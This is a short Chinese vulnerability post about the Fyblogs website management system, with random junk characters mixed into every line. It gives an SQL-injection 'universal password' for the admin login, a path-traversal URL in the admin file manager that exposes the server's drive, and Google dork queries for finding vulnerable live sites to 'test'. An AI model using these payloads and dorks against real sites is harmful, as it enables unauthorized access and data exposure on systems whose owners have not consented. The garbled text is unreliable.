漏洞类型: 未授权访问/权限绕过& U' }8 {' I7 s, r1 u! }" W9 M" f
0 g- S9 H2 B' I6 m简要描述:( o" [$ k- O9 [% ^: o6 j- w
4 i, J6 ^5 w& v, b7 z6 N$ rFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
j& p/ M5 H0 Q% z/ _. d4 ^
- v. Z4 \9 {* }. \% D( T详细说明:) x6 r6 `2 C z1 ]1 S
4 b; [" I$ _( Q' S3 p$ _
后台万能密码 'or'='or'
1 n: U4 a9 o( n) ` O3 w% x: z后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: N" x5 N9 `) A& a1 l/ {7 w3 Badmin/uploadfile.asp?currentFolder=/upfiles/../
3 `' X6 O3 Z% f
% O1 C: z7 h3 D7 [漏洞证明:" p! K3 B. C- S0 D
3 B$ D+ I% J* [5 J. `" b+ D2 ?' f
谷歌:inurl:type.asp?id=1 新闻中心
6 T* [+ N9 g2 b# g" [' E4 M; A; [或者 :inurl:download_ok.asp?# O* N: t" |: Q3 f; F3 c/ Q
, |/ ^5 ^ k9 F4 @- t3 ?可以测试
) B: n& y7 H' }/ T
7 T: c) w% Z) {: L. L5 v+ i
& F/ R* i1 \+ s2 n q |